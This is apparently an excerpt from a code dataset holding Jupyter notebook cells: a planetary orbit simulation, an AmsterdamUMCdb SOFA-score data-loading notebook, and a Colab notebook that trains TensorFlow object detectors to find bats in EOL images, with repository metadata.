if(p.x[0]==0.0):\n if(p.x[1]>0.0):\n theta = 0.5*np.pi\n else:\n theta = 1.5*np.pi\n else:\n theta = np.arctan2(p.x[1],p.x[0])\n \n #set the x and y components of the velocity\n #p.a_g[0] = a_grav * np.cos(theta)\n #p.a_g[1] =a_grav * np.sin(theta)\n return a_grav*np.cos(theta), a_grav*np.sin(theta)", "_____no_output_____" ], [ "def calc_dt(p):\n\n #integration tolerance\n ETA_TIME_STEP = 0.0004\n \n #compute timestep\n eta = ETA_TIME_STEP\n v = (p.v[0]**2 + p.v[1]**2)**0.5\n a = (p.a_g[0]**2 + p.a_g[1]**2)**0.5\n dt = eta * np.fmin(1./np.fabs(v),1./np.fabs(a)**0.5)\n \n return dt", "_____no_output_____" ], [ "def SetPlanet(p, i):\n \n AU_in_km = 1.495979e+8 #an AU in km\n \n #circular velocity\n v_c = 0.0 #circular velocity in AU/yr\n v_e = 0.0 #velocity at perihelion in AU/yr\n \n #planet-by planet initial conditions\n \n #Mercury\n if(i==0):\n #semi-major axis in AU\n p.a = 57909227.0/AU_in_km\n \n #eccentricity\n p.e = 0.20563593\n \n #name\n p.name = \"Mercury\"\n \n #Venus\n elif(i==1):\n #semi-major axis in AU\n p.a = 108209475.0/AU_in_km\n \n #eccentricity\n p.e = 0.00677672\n \n #name\n p.name = \"Venus\"\n \n #Earth\n elif(i==2):\n #semi-major axis in AU\n p.a = 1.0\n \n #eccentricity\n p.e = 0.01671123\n \n #name\n p.name = \"Earth\"\n \n #set remaining properties\n p.t = 0.0\n p.x[0] = p.a*(1.0-p.e)\n p.x[1] = 0.0\n \n #get equiv circular velocity\n v_c = SolarCircularVelocity(p)\n \n #velocity at perihelion\n v_e = v_c*(1 + p.e)**0.5\n \n #set velocity\n p.v[0] = 0.0 #no x velocity at perihelion\n p.v[1] = v_e #y velocity at perihelion (counter clockwise)\n \n #calculate gravitational acceleration from Sun\n p.a_g = SolarGravitationalAcceleration(p)\n \n #set timestep\n p.dt = calc_dt(p)", "_____no_output_____" ], [ "def x_first_step(x_i, v_i, a_i, dt):\n #x_1/2 = x_0+ 1/2 v_0 Delta_t + 1/4 a_0 Delta t^2\n return x_i + 0.5*v_i*dt + 0.25*a_i*dt**2", "_____no_output_____" ], [ "def v_full_step(v_i,a_ipoh,dt):\n #v_i+1 = v_i + a_i+1/2 Delta t\n return v_i + a_ipoh*dt;", "_____no_output_____" ], [ "def x_full_step(x_ipoh, v_ipl, a_ipoh, dt):\n #x_3/2 = x_1/2 + v_i+1 Delta t\n return x_ipoh + v_ipl*dt;", "_____no_output_____" ], [ "def SaveSolarSystem(p, n_planets, t, dt , istep, ndim):\n \n #loop over the number of planets\n for i in range(n_planets):\n \n #define a filename\n fname = \"planet.%s.txt\" % p[i].name\n \n 
if(istep==0):\n #create the file on the first timestep\n fp = open(fname,\"w\")\n else:\n #append the file on subsequent timesteps\n fp = open(fname,\"a\")\n \n #compute the drifted properties of the planet\n v_drift = np.zeros(ndim)\n \n for k in range(ndim):\n v_drift[k] = p[i].v[k] + 0.5*p[i].a_g[k]*p[i].dt\n \n #write the data to file\n s = \"%6d\\t%6.5f\\t%6.5f\\t%6d\\t%6.5f\\t%6.5f\\t%6.5f\\t%6.5ft\\%6.5f\\t%6.5f\\t%6.5f\\t%6.5fn\" % \\\n (istep,t,dt,p[i].istep,p[i].t,p[i].dt,p[i].x[0],p[i].x[1],v_drift[0],v_drift[1],p[i].a_g[0],p[i].a_g[1])\n fp.write(s)\n \n #close the file\n fp.close()", "_____no_output_____" ], [ "def EvolveSolarSystem(p,n_planets,t_max):\n #number of spatial dimensions\n ndim = 2\n \n #define the first timestep\n dt = 0.5/265.25\n \n #define the starting time\n t = 0.0\n \n #define the starting timestep\n istep = 0\n \n #save the initial conditions\n SaveSolarSystem(p,n_planets,t,dt,istep,ndim)\n \n #begin a loop over the global timescale\n while(t<t_max):\n \n #check to see if the next step exceeds the\n #maximum time. If so, take a smaller step\n if(t+dt>t_max):\n dt = t_max - t #limit the step to align with t_max\n \n #evolve each planet\n for i in range(n_planets):\n \n while(p[i].t<t+dt):\n \n #special case for istep==0\n if(p[i].istep==0):\n \n #take the first step according to a verlet scheme\n for k in range(ndim):\n p[i].x[k] = x_first_step(p[i].x[k],p[i].v[k],p[i].a_g[k],p[i].dt)\n \n #update the acceleration\n p[i].a_g = SolarGravitationalAcceleration(p[i])\n \n #update the time by 1/2dt\n p[i].t += 0.5*p[i].dt\n \n #update the timestep\n p[i].dt = calc_dt(p[i])\n \n #continue with a normal step\n \n #limit to align with the global timestep\n if(p[i].t + p[i].dt > t+dt):\n p[i].dt = t+dt-p[i].t\n \n #evolve the velocity\n for k in range(ndim):\n p[i].v[k] = v_full_step(p[i].v[k],p[i].a_g[k],p[i].dt)\n \n #evolve the position\n for k in range(ndim):\n p[i].x[k] = x_full_step(p[i].x[k],p[i].v[k],p[i].a_g[k],p[i].dt)\n \n #update the acceleration\n p[i].a_g = SolarGravitationalAcceleration(p[i])\n \n #update by dt\n p[i].t += p[i].dt\n \n #compute the new timestep\n p[i].dt = calc_dt(p[i])\n \n #update the planet's timestep\n p[i].istep+=1\n \n #now update the global system time\n t+=dt\n \n #update the global step number\n istep += 1\n \n #output the current state\n SaveSolarSystem(p,n_planets,t,dt,istep,ndim)\n \n #print the final steps and time\n print(\"Time t = \",t)\n print(\"Maximum t = \", t_max)\n print(\"Maximum number of steps = \", istep)\n \n #end of evolution", "_____no_output_____" ], [ "def read_twelve_arrays(fname):\n fp = open(fname,\"r\")\n fl = fp.readlines()\n n = len(fl)\n a = np.zeros(n)\n b = np.zeros(n)\n c = np.zeros(n)\n d = np.zeros(n)\n f = np.zeros(n)\n g = np.zeros(n)\n h = np.zeros(n)\n j = np.zeros(n)\n k = np.zeros(n)\n l = np.zeros(n)\n m = np.zeros(n)\n p = np.zeros(n)\n for i in range(n):\n a[i] = float(fl[i].split()[0])\n b[i] = float(fl[i].split()[1])\n c[i] = float(fl[i].split()[2])\n d[i] = float(fl[i].split()[3])\n f[i] = float(fl[i].split()[4])\n g[i] = float(fl[i].split()[5])\n h[i] = float(fl[i].split()[6])\n j[i] = float(fl[i].split()[7])\n k[i] = float(fl[i].split()[8])\n l[i] = float(fl[i].split()[9])\n m[i] = float(fl[i].split()[10])\n p[i] = float(fl[i].split()[11])\n \n return a,b,c,d,f,g,h,j,k,l,m,p\n ", "_____no_output_____" ], [ "#set the number of planets\nn_planets = 3\n\n#set the maxmimum time of the simulation\nt_max = 2.0\n\n#create empty list of planets\np = []\n\n#set the planets\nfor i in 
range(n_planets):\n \n #create an empty planet\n ptmp = planet(0.0,0.0)\n \n #set the planet properties\n SetPlanet(ptmp,i)\n \n #remember the planet\n p.append(ptmp)\n \n#evolve the solar system\nEvolveSolarSystem(p,n_planets,t_max)", "Time t = 2.0018850141376423\nMaximum t = 2.0\nMaximum number of steps = 1062\n" ], [ "fname = \"planet.Mercury.txt\"\nistepMg,tMg,dtMg,istepM,tM,dtM,xM,yM,vxM,vyM,axM,ayM = read_twelve_arrays(fname)", "_____no_output_____" ], [ "fname = \"planet.Earth.txt\"\nistepEg,tEg,dtEg,istepE,tE,dtE,xE,yE,vxE,vyE,axE,ayE = read_twelve_arrays(fname)", "_____no_output_____" ], [ "fname = \"planet.Venus.txt\"\nistepVg,tVg,dtVg,istepV,tV,dtV,xV,yV,vx,vyV,axV,ayV = read_twelve_arrays(fname)", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1f678c4d6800b9c560560fcd92c028b96c69ac
4,195
ipynb
Jupyter Notebook
sepsis/extract_data.ipynb
yinchangchang/AmsterdamUMCdb
3ea8b852198f00a869f7e7d1b7c342062d90a42e
[ "MIT" ]
1
2021-02-03T13:38:07.000Z
2021-02-03T13:38:07.000Z
sepsis/extract_data.ipynb
yinchangchang/AmsterdamUMCdb
3ea8b852198f00a869f7e7d1b7c342062d90a42e
[ "MIT" ]
null
null
null
sepsis/extract_data.ipynb
yinchangchang/AmsterdamUMCdb
3ea8b852198f00a869f7e7d1b7c342062d90a42e
[ "MIT" ]
null
null
null
35.252101
597
0.647199
[ [ [ "<img src=\"../../img/logo_amds.png\" alt=\"Logo\" style=\"width: 128px;\"/>\n\n# AmsterdamUMCdb - Freely Accessible ICU Database\n\nversion 1.0.2 March 2020 \nCopyright &copy; 2003-2020 Amsterdam UMC - Amsterdam Medical Data Science", "_____no_output_____" ], [ "## Sequential Organ Failure Assessment (SOFA)\nThe sequential organ failure assessment score (SOFA score), originally published as as the Sepsis-related Organ Failure Assessment score ([Vincent et al., 1996](http://link.springer.com/10.1007/BF01709751)), is a disease severity score designed to track the severity of critical ilness throughout the ICU stay. In contrast to APACHE (II/IV), which only calculates a score for the first 24 hours, it can be used sequentially for every following day. The code performs some data cleanup and calculates the SOFA score for the first 24 hours of ICU admission for all patients in the database.\n\n**Note**: Requires creating the [dictionaries](../../dictionaries/create_dictionaries.ipynb) before running this notebook.", "_____no_output_____" ], [ "## Imports", "_____no_output_____" ] ], [ [ "%matplotlib inline\nimport amsterdamumcdb\nimport psycopg2\nimport pandas as pd\nimport numpy as np\nimport re\n\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib as mpl\n\nimport io\nfrom IPython.display import display, HTML, Markdown", "_____no_output_____" ], [ "sofa = pd.read_csv('sofa/sofa.csv')\noxy_flow = pd.read_csv(\"sofa/oxy_flow.csv\" )\nsofa_respiration = pd.read_csv(\"sofa/sofa_respiration.csv\" )\nsofa_platelets = pd.read_csv(\"sofa/sofa_platelets.csv\" )\nsofa_bilirubin = pd.read_csv(\"sofa/sofa_bilirubin.csv\" )\nsofa_cardiovascular = pd.read_csv(\"sofa/sofa_cardiovascular.csv\" )\nmean_abp = pd.read_csv(\"sofa/mean_abp.csv\" )\nsofa_cardiovascular_map = pd.read_csv(\"sofa/sofa_cardiovascular_map.csv\" )\ngcs = pd.read_csv(\"sofa/gcs.csv\" )\nsofa_cns = pd.read_csv(\"sofa/sofa_cns.csv\" )\nsofa_renal_urine_output = pd.read_csv(\"sofa/sofa_renal_urine_output.csv\" )\nsofa_renal_daily_urine_output = pd.read_csv(\"sofa/sofa_renal_daily_urine_output.csv\" )\ncreatinine = pd.read_csv(\"sofa/creatinine.csv\" )\nsofa_renal_creatinine = pd.read_csv(\"sofa/sofa_renal_creatinine.csv\" )\nsofa_renal = pd.read_csv(\"sofa/sofa_renal.csv\" )", "_____no_output_____" ], [ "'''\n\nbloc,icustayid,charttime,gender,age,elixhauser,re_admission,died_in_hosp,died_within_48h_of_out_time,\nmortality_90d,delay_end_of_record_and_discharge_or_death,\n\nWeight_kg,GCS,HR,SysBP,MeanBP,DiaBP,RR,SpO2,Temp_C,FiO2_1,Potassium,Sodium,Chloride,Glucose,\nBUN,Creatinine,Magnesium,Calcium,Ionised_Ca,CO2_mEqL,SGOT,SGPT,Total_bili,Albumin,Hb,WBC_count,\nPlatelets_count,PTT,PT,INR,Arterial_pH,paO2,paCO2,Arterial_BE,Arterial_lactate,HCO3,mechvent,\nShock_Index,PaO2_FiO2,median_dose_vaso,max_dose_vaso,input_total,\ninput_4hourly,output_total,output_4hourly,cumulated_balance,SOFA,SIRS\n\n'''", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown", "markdown", "markdown" ], [ "code", "code", "code" ] ]
cb1f6ca23ab0c1dba7084b43f9f22b41a3ca79f5
29,591
ipynb
Jupyter Notebook
object_detection_for_image_cropping/chiroptera/chiroptera_train_tf2_ssd_rcnn.ipynb
aubricot/computer_vision_with_eol_images
33f5df56568992b01ad953364c77f9fd0a977b2f
[ "MIT" ]
4
2020-06-02T19:01:23.000Z
2021-06-01T20:01:29.000Z
object_detection_for_image_cropping/chiroptera/chiroptera_train_tf2_ssd_rcnn.ipynb
aubricot/computer_vision_with_eol_images
33f5df56568992b01ad953364c77f9fd0a977b2f
[ "MIT" ]
null
null
null
object_detection_for_image_cropping/chiroptera/chiroptera_train_tf2_ssd_rcnn.ipynb
aubricot/computer_vision_with_eol_images
33f5df56568992b01ad953364c77f9fd0a977b2f
[ "MIT" ]
2
2020-06-02T21:49:00.000Z
2021-04-21T07:42:30.000Z
42.454806
320
0.545909
[ [ [ "<a href=\"https://colab.research.google.com/github/aubricot/computer_vision_with_eol_images/blob/master/object_detection_for_image_cropping/chiroptera/chiroptera_train_tf2_ssd_rcnn.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ], [ "# Train Tensorflow Faster-RCNN and SSD models to detect bats (Chiroptera) from EOL images\n--- \n*Last Updated 19 Oct 2021* \n-Now runs in Python 3 with Tensorflow 2.0- \n\nUse EOL user generated cropping coordinates to train Faster-RCNN and SSD Object Detection Models implemented in Tensorflow to detect bats from EOL images. Training data consists of the user-determined best square thumbnail crop of an image, so model outputs will also be a square around objects of interest.\n\nDatasets were downloaded to Google Drive in [chiroptera_preprocessing.ipynb](https://github.com/aubricot/computer_vision_with_eol_images/blob/master/object_detection_for_image_cropping/chiroptera/chiroptera_preprocessing.ipynb).\n\n***Models were trained in Python 2 and TF 1 in Jan 2020: RCNN trained for 2 days to 200,000 steps and SSD for 4 days to 450,000 steps.***\n\nNotes: \n* Before you you start: change the runtime to \"GPU\" with \"High RAM\"\n* Change parameters using form fields on right (/where you see 'TO DO' in code)\n* For each 24 hour period on Google Colab, you have up to 12 hours of free GPU access. \n\nReferences: \n* [Official Tensorflow Object Detection API Instructions](https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/training.html) \n* [Medium Blog on training using Tensorflow Object Detection API in Colab](https://medium.com/analytics-vidhya/training-an-object-detection-model-with-tensorflow-api-using-google-colab-4f9a688d5e8b)", "_____no_output_____" ], [ "## Installs & Imports\n---", "_____no_output_____" ] ], [ [ "# Mount google drive to import/export files\nfrom google.colab import drive\ndrive.mount('/content/drive', force_remount=True)", "_____no_output_____" ], [ "# For running inference on the TF-Hub module\nimport tensorflow as tf\nimport tensorflow_hub as hub\n\n# For downloading and displaying images\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport tempfile\nimport urllib\nfrom urllib.request import urlretrieve\nfrom six.moves.urllib.request import urlopen\nfrom six import BytesIO\n\n# For drawing onto images\nfrom PIL import Image\nfrom PIL import ImageColor\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nfrom PIL import ImageOps\n\n# For measuring the inference time\nimport time\n\n# For working with data\nimport numpy as np\nimport pandas as pd\nimport os\nimport csv\n\n# Print Tensorflow version\nprint('Tensorflow Version: %s' % tf.__version__)\n\n# Check available GPU devices\nprint('The following GPU devices are available: %s' % tf.test.gpu_device_name())\n\n# Define functions\n\n# Read in data file exported from \"Combine output files A-D\" block above\ndef read_datafile(fpath, sep=\"\\t\", header=0, disp_head=True):\n \"\"\"\n Defaults to tab-separated data files with header in row 0\n \"\"\"\n try:\n df = pd.read_csv(fpath, sep=sep, header=header)\n if disp_head:\n print(\"Data header: \\n\", df.head())\n except FileNotFoundError as e:\n raise Exception(\"File not found: Enter the path to your file in form field and re-run\").with_traceback(e.__traceback__)\n \n return df\n\n# To load image in and do something with it\ndef load_img(path): \n img = tf.io.read_file(path)\n img = 
tf.image.decode_jpeg(img, channels=3)\n return img\n\n# To display loaded image\ndef display_image(image):\n fig = plt.figure(figsize=(20, 15))\n plt.grid(False)\n plt.imshow(image)\n\n# For reading in images from URL and passing through TF models for inference\ndef download_and_resize_image(url, new_width=256, new_height=256, #From URL\n display=False):\n _, filename = tempfile.mkstemp(suffix=\".jpg\")\n response = urlopen(url)\n image_data = response.read()\n image_data = BytesIO(image_data)\n pil_image = Image.open(image_data)\n im_h, im_w = pil_image.size\n pil_image = ImageOps.fit(pil_image, (new_width, new_height), Image.ANTIALIAS)\n pil_image_rgb = pil_image.convert(\"RGB\")\n pil_image_rgb.save(filename, format=\"JPEG\", quality=90)\n #print(\"Image downloaded to %s.\" % filename)\n if display:\n display_image(pil_image)\n return filename, im_h, im_w", "_____no_output_____" ], [ "# Download, compile and build the Tensorflow Object Detection API (takes 4-9 minutes)\n\n# TO DO: Type in the path to your working directory in form field to right\nbasewd = \"/content/drive/MyDrive/train\" #@param {type:\"string\"}\n%cd $basewd\n\n# Set up directory for TF2 Model Garden\n# TO DO: Type in the folder you would like to contain TF2\nfolder = \"tf2\" #@param {type:\"string\"}\nif not os.path.exists(folder):\n os.makedirs(folder)\n %cd $folder\n os.makedirs(\"tf_models\")\n %cd tf_models\n # Clone the Tensorflow Model Garden\n !git clone --depth 1 https://github.com/tensorflow/models/\n %cd ../..\n\n# Build the Object Detection API\nwd = basewd + '/' + folder\n%cd $wd\n!cd tf_models/models/research/ && protoc object_detection/protos/*.proto --python_out=. && cp object_detection/packages/tf2/setup.py . && python -m pip install .", "_____no_output_____" ] ], [ [ "## Model preparation (only run once)\n---\nThese blocks download and set-up files needed for training object detectors. 
After running once, you can train and re-train as many times as you'd like.", "_____no_output_____" ], [ "### Download and extract pre-trained models ", "_____no_output_____" ] ], [ [ "# Download pre-trained models from Tensorflow Object Detection Model Zoo\n# https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/tf2_detection_zoo.md\n# SSD and Faster-RCNN used as options below\n# modified from https://github.com/RomRoc/objdet_train_tensorflow_colab/blob/master/objdet_custom_tf_colab.ipynb\n\nimport shutil\nimport glob\nimport tarfile\n\n# CD to folder where TF models are installed (tf2)\n%cd $wd\n\n# Make folders for your training files for each model\n# Faster RCNN Model\nif not (os.path.exists('tf_models/train_demo')):\n !mkdir tf_models/train_demo\nif not (os.path.exists('tf_models/train_demo/rcnn')):\n !mkdir tf_models/train_demo/rcnn\nif not (os.path.exists('tf_models/train_demo/rcnn/pretrained_model')):\n !mkdir tf_models/train_demo/rcnn/pretrained_model\nif not (os.path.exists('tf_models/train_demo/rcnn/finetuned_model')):\n !mkdir tf_models/train_demo/rcnn/finetuned_model\nif not (os.path.exists('tf_models/train_demo/rcnn/trained')):\n !mkdir tf_models/train_demo/rcnn/trained\n# Download the model\nMODEL = 'faster_rcnn_resnet50_v1_640x640_coco17_tpu-8'\nMODEL_FILE = MODEL + '.tar.gz'\nDOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/tf2/20200711/'\nDEST_DIR = 'tf_models/train_demo/rcnn/pretrained_model'\nif not (os.path.exists(MODEL_FILE)):\n urlretrieve(DOWNLOAD_BASE + MODEL_FILE, MODEL_FILE)\n\ntar = tarfile.open(MODEL_FILE)\ntar.extractall()\ntar.close()\n\nos.remove(MODEL_FILE)\nif (os.path.exists(DEST_DIR)):\n shutil.rmtree(DEST_DIR)\nos.rename(MODEL, DEST_DIR)\n\n# SSD Model\nif not (os.path.exists('tf_models/train_demo/ssd')):\n !mkdir tf_models/train_demo/ssd\nif not (os.path.exists('tf_models/train_demo/ssd/pretrained_model')):\n !mkdir tf_models/train_demo/ssd/pretrained_model\nif not (os.path.exists('tf_models/train_demo/ssd/finetuned_model')):\n !mkdir tf_models/train_demo/ssd/finetuned_model\nif not (os.path.exists('tf_models/train_demo/ssd/trained')):\n !mkdir tf_models/train_demo/ssd/trained\n# Download the model\nMODEL = 'ssd_mobilenet_v2_320x320_coco17_tpu-8'\nMODEL_FILE = MODEL + '.tar.gz'\nDOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/tf2/20200711/'\nDEST_DIR = 'tf_models/train_demo/ssd/pretrained_model'\nif not (os.path.exists(MODEL_FILE)):\n urlretrieve(DOWNLOAD_BASE + MODEL_FILE, MODEL_FILE)\n\ntar = tarfile.open(MODEL_FILE)\ntar.extractall()\ntar.close()\n\nos.remove(MODEL_FILE)\nif (os.path.exists(DEST_DIR)):\n shutil.rmtree(DEST_DIR)\nos.rename(MODEL, DEST_DIR)", "_____no_output_____" ] ], [ [ "### Convert training data to tf.record format", "_____no_output_____" ], [ "1) Download generate_tfrecord.py using code block below\n\n2) Open the Colab file explorer on the right and navigate to your current working directory\n\n3) Double click on generate_tfrecord.py to open it in the Colab text editor.\n\n4) Modify the file for your train dataset: \n* update label names to the class(es) of interest at line 31 (Chiroptera)\n # TO-DO replace this with label map\n def class_text_to_int(row_label):\n if row_label == 'Chiroptera':\n return 1\n else:\n None\n* update the filepath where you want your train tf.record file to save at line 85\n # TO-DO replace path with your filepath\n def main(_):\n writer = tf.python_io.TFRecordWriter('/content/drive/MyDrive/[yourfilepath]/tf.record')\n\n5) Close 
Colab text editor and proceed with steps below to generate tf.record files for your test and train datasets", "_____no_output_____" ] ], [ [ "# Download chiroptera_generate_tfrecord.py to your wd in Google Drive\n# Follow directions above to modify the file for your dataset\n!gdown --id 1fVXeuk7ALHTlTLK3GGH8p6fMHuuWt1Sr", "_____no_output_____" ], [ "# Convert crops_test to tf.record format for test data\n# Modified from https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/training.html\n\n# TO DO: Update file paths in form fields\ncsv_input = \"/content/drive/MyDrive/train/tf2/pre-processing/Chiroptera_crops_test_notaug_oob_rem_fin.csv\" #@param {type:\"string\"}\noutput_path = \"/content/drive/MyDrive/train/tf2/test_images/tf.record\" #@param {type:\"string\"}\ntest_image_dir = \"/content/drive/MyDrive/train/tf2/test_images\" #@param {type:\"string\"}\n\n!python chiroptera_generate_tfrecord.py --csv_input=$csv_input --output_path=$output_path --image_dir=$test_image_dir", "_____no_output_____" ], [ "# Move tf.record for test images to test images directory\n!mv tf.record $image_dir", "_____no_output_____" ], [ "# Convert crops_train to tf.record format for train data\n# Modified from https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/training.html\n\n# TO DO: Update file paths in form fields\ncsv_input = \"/content/drive/MyDrive/train/tf2/pre-processing/Chiroptera_crops_train_aug_oob_rem_fin.csv\" #@param {type:\"string\"}\noutput_path = \"/content/drive/MyDrive/train/tf2/images/tf.record\" #@param {type:\"string\"}\ntrain_image_dir = \"/content/drive/MyDrive/train/tf2/images\" #@param {type:\"string\"}\nglobal image_dir\n\n!python chiroptera_generate_tfrecord.py --csv_input=$csv_input --output_path=$output_path --image_dir=$train_image_dir", "_____no_output_____" ], [ "# Move tf.record for training images to train images directory\n!mv tf.record $image_dir", "_____no_output_____" ] ], [ [ "### Make label map for class Chiroptera", "_____no_output_____" ] ], [ [ "%%writefile labelmap.pbtxt\nitem {\n id: 1\n name: 'Chiroptera'\n}", "_____no_output_____" ] ], [ [ "### Modify model config files for training Faster-RCNN and SSD with your dataset", "_____no_output_____" ], [ "If you have errors with training, check the pipline_config_path and model_dir in the config files for R-FCN or Faster-RCNN model", "_____no_output_____" ] ], [ [ "# Adjust model config file based on training/testing datasets\n# Modified from https://stackoverflow.com/a/63645324\nfrom google.protobuf import text_format\nfrom object_detection.protos import pipeline_pb2\n%cd $wd\n\n# TO DO: Adjust parameters ## add form fields here\nfilter = \"Chiroptera\" #@param {type:\"string\"}\nconfig_basepath = \"tf_models/train_demo/\" #@param {type:\"string\"}\nlabel_map = 'labelmap.pbtxt'\ntrain_tfrecord_path = \"/content/drive/MyDrive/train/tf2/images/tf.record\" #@param {type:\"string\"}\ntest_tfrecord_path = \"/content/drive/MyDrive/train/tf2/test_images/tf.record\" #@param {type:\"string\"}\nft_ckpt_basepath = \"/content/drive/MyDrive/train/tf2/tf_models/train_demo/\" #@param {type:\"string\"}\nft_ckpt_type = \"detection\" #@param [\"detection\", \"classification\"]\nnum_classes = 1 #@param\nbatch_size = 1 #@param [\"1\", \"4\", \"8\", \"16\", \"32\", \"64\", \"128\"] {type:\"raw\"}\n\n# Define pipeline for modifying model config files\n\ndef read_config(model_config):\n if 'rcnn/' in model_config:\n model_ckpt = 'rcnn/pretrained_model/checkpoint/ckpt-0'\n elif 'ssd/' in 
model_config:\n model_ckpt = 'ssd/pretrained_model/checkpoint/ckpt-0'\n config_fpath = config_basepath + model_config\n pipeline = pipeline_pb2.TrainEvalPipelineConfig() \n with tf.io.gfile.GFile(config_fpath, \"r\") as f: \n proto_str = f.read() \n text_format.Merge(proto_str, pipeline)\n return pipeline, model_ckpt, config_fpath\n\ndef modify_config(pipeline, model_ckpt, ft_ckpt_basepath):\n finetune_checkpoint = ft_ckpt_basepath + model_ckpt\n pipeline.model.faster_rcnn.num_classes = num_classes\n pipeline.train_config.fine_tune_checkpoint = finetune_checkpoint\n pipeline.train_config.fine_tune_checkpoint_type = ft_ckpt_type\n pipeline.train_config.batch_size = batch_size\n pipeline.train_config.use_bfloat16 = False # True only if training on TPU\n\n pipeline.train_input_reader.label_map_path = label_map\n pipeline.train_input_reader.tf_record_input_reader.input_path[0] = train_tfrecord_path\n\n pipeline.eval_input_reader[0].label_map_path = label_map\n pipeline.eval_input_reader[0].tf_record_input_reader.input_path[0] = test_tfrecord_path\n\n return pipeline\n\ndef write_config(pipeline, config_fpath):\n config_outfpath = os.path.splitext(config_fpath)[0] + '_' + filter + '.config'\n config_text = text_format.MessageToString(pipeline) \n with tf.io.gfile.GFile(config_outfpath, \"wb\") as f: \n f.write(config_text)\n \n return config_outfpath\n\ndef setup_pipeline(model_config, ft_ckpt_basepath):\n print('\\n Modifying model config file for {}'.format(model_config))\n pipeline, model_ckpt, config_fpath = read_config(model_config)\n pipeline = modify_config(pipeline, model_ckpt, ft_ckpt_basepath)\n config_outfpath = write_config(pipeline, config_fpath)\n print(' Modifed model config file saved to {}'.format(config_outfpath))\n if config_outfpath:\n return \"Success!\"\n else:\n return \"Fail: try again\"\n\n# Modify model configs\nmodel_configs = ['rcnn/pretrained_model/pipeline.config', 'ssd/pretrained_model/pipeline.config']\n[setup_pipeline(model_config, ft_ckpt_basepath) for model_config in model_configs]", "_____no_output_____" ] ], [ [ "## Train\n--- ", "_____no_output_____" ] ], [ [ "# Determine how many train and eval steps to use based on dataset size\n\n# TO DO: Only need to update path if you didn't just run \"Model Preparation\" block above\ntry: \n train_image_dir\nexcept NameError:\n train_image_dir = \"/content/drive/MyDrive/train/tf2/images\" #@param {type:\"string\"}\nexamples = len(os.listdir(train_image_dir))\nprint(\"Number of train examples: \\n\", examples)\n\n# Get the number of testing examples\n# TO DO: Only need to update path if you didn't just run \"Model Preparation\" block above\ntry:\n test_image_dir\nexcept NameError:\n test_image_dir = \"/content/drive/MyDrive/train/tf2/test_images\" #@param {type:\"string\"}\ntest_examples = len(os.listdir(test_image_dir))\nprint(\"Number of test examples: \\n\", test_examples)\n\n# Get the training batch size\n# TO DO: Only need to update value if you didn't just run \"Model Preparation\" block above\ntry:\n batch_size\nexcept NameError:\n batch_size = 1 #@param [\"1\", \"4\", \"8\", \"16\", \"32\", \"64\", \"128\"] {type:\"raw\"}\nprint(\"Batch size: \\n\", batch_size)\n\n# Calculate roughly how many steps to use for training and testing\nsteps_per_epoch = examples / batch_size\nnum_eval_steps = test_examples / batch_size\nprint(\"Number of steps per training epoch: \\n\", int(steps_per_epoch))\nprint(\"Number of evaluation steps: \\n\", int(num_eval_steps))", "_____no_output_____" ], [ "# TO DO: Choose how many epochs 
to train for\nepochs = 410 #@param {type:\"slider\", min:10, max:1000, step:100}\nnum_train_steps = int(epochs * steps_per_epoch)\nnum_eval_steps = int(num_eval_steps)\n# TO DO: Choose paths for RCNN or SSD model\npipeline_config_path = \"tf_models/train_demo/rcnn/pretrained_model/pipeline_Chiroptera.config\" #@param [\"tf_models/train_demo/rcnn/pretrained_model/pipeline_Chiroptera.config\", \"tf_models/train_demo/ssd/pretrained_model/pipeline_Chiroptera.config\"]\nmodel_dir = \"tf_models/train_demo/rcnn/trained\" #@param [\"tf_models/train_demo/rcnn/trained\", \"tf_models/train_demo/ssd/trained\"]\noutput_directory = \"tf_models/train_demo/rcnn/finetuned_model\" #@param [\"tf_models/train_demo/rcnn/finetuned_model\", \"tf_models/train_demo/ssd/finetuned_model\"]\ntrained_checkpoint_dir = \"tf_models/train_demo/rcnn/trained\" #@param [\"tf_models/train_demo/rcnn/trained\", \"tf_models/train_demo/ssd/trained\"] {allow-input: true}\n\n# Save vars to environment for access with cmd line tools below\nos.environ[\"trained_checkpoint_dir\"] = \"trained_checkpoint_dir\"\nos.environ[\"num_train_steps\"] = \"num_train_steps\"\nos.environ[\"num_eval_steps\"] = \"num_eval_steps\"\nos.environ[\"pipeline_config_path\"] = \"pipeline_config_path\"\nos.environ[\"model_dir\"] = \"model_dir\"\nos.environ[\"output_directory\"] = \"output_directory\"", "_____no_output_____" ], [ "# Optional: Visualize training progress with Tensorboard\n\n# Load the TensorBoard notebook extension\n%load_ext tensorboard\n# Log training progress using TensorBoard\n%tensorboard --logdir $model_dir", "_____no_output_____" ], [ "# Actual training\n# Note: You can change the number of epochs in code block below and re-run to train longer\n# Modified from https://github.com/RomRoc/objdet_train_tensorflow_colab/blob/master/objdet_custom_tf_colab.ipynb\nmatplotlib.use('Agg')\n%cd $wd\n\n!python tf_models/models/research/object_detection/model_main_tf2.py \\\n --alsologtostderr \\\n --num_train_steps=$num_train_steps \\\n --num_eval_steps=$num_eval_steps \\\n --pipeline_config_path=$pipeline_config_path \\\n --model_dir=$model_dir ", "_____no_output_____" ], [ "# Export trained model\n# Modified from https://github.com/RomRoc/objdet_train_tensorflow_colab/blob/master/objdet_custom_tf_colab.ipynb\n%cd $wd\n\n# Save the model\n!python tf_models/models/research/object_detection/exporter_main_v2.py \\\n --input_type image_tensor \\\n --pipeline_config_path=$pipeline_config_path \\\n --trained_checkpoint_dir=$trained_checkpoint_dir \\\n --output_directory=$output_directory", "_____no_output_____" ], [ "# Evaluate trained model to get mAP and IoU stats for COCO 2017\n# Change pipeline_config_path and checkpoint_dir when switching between SSD and Faster-RCNN 